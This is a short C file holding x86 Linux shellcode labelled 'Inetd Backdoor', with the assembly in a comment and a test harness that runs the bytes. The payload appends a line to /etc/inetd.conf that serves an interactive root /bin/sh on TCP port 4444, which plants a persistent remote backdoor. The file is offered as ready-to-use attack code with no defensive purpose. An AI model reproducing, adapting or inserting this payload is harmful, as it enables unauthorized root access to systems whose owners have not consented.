/*
 * Shellcode: Inetd Backdoor
 * Coded by hydroic
 * hydroic@yahoo.com
 * http://hydroic.tsx.org
 *
 * asm code:
 *
 *	  xor   %eax,%eax
 *	  mov   $0x666e6fff,%ebx
 * 	  shr   $0x8,%ebx
 *	  push  %ebx
 *	  push  $0x632e6474
 *	  push  $0x656e692f
 *	  push  $0x6374652f
 *	  mov   %esp,%ebx
 *	  mov   $0x402,%cx
 *	  mov   $0x5,%al
 *	  int   $0x80
 *	  mov   %eax,%ebx
 *	  push  $0x0a692d20
 *	  push  $0x68732068
 *	  push  $0x732f6e69
 *	  push  $0x622f2074
 *	  push  $0x6f6f7220
 *	  push  $0x74696177
 *	  push  $0x6f6e2070
 *	  push  $0x6374206d
 *	  push  $0x61657274
 *	  push  $0x73203434
 *	  push  $0x3434340a
 *	  mov   %esp,%ecx
 *	  xor   %edx,%edx
 *	  mov   $0x2b,%dl
 *	  mov   $0x4,%al
 *	  int   $0x80
 *	  xor   %eax,%eax
 *	  xor   %ebx,%ebx
 *	  mov   $0x1,%al
 *	  int   $0x80
 */

#include <stdio.h>

char intdbackd[]="\x31\xc0\xbb\xff\x6f\x6e\x66\xc1\xeb\x08\x53\x68"
		 "\x74\x64\x2e\x63\x68\x2f\x69\x6e\x65\x68\x2f\x65"
		 "\x74\x63\x89\xe3\x66\xb9\x02\x04\xb0\x05\xcd\x80"
		 "\x89\xc3\x68\x20\x2d\x69\x0a\x68\x68\x20\x73\x68"
		 "\x68\x69\x6e\x2f\x73\x68\x74\x20\x2f\x62\x68\x20"
		 "\x72\x6f\x6f\x68\x77\x61\x69\x74\x68\x70\x20\x6e"
		 "\x6f\x68\x6d\x20\x74\x63\x68\x74\x72\x65\x61\x68"
		 "\x34\x34\x20\x73\x68\x0a\x34\x34\x34\x89\xe1\x31"
		 "\xd2\xb2\x2b\xb0\x04\xcd\x80\x31\xc0\x31\xdb\xb0"
		 "\x01\xcd\x80";

main(){
 long (*run)();

  printf("Shellcode: %d bytes.\n",strlen(intdbackd));
  run=intdbackd;
  run();
}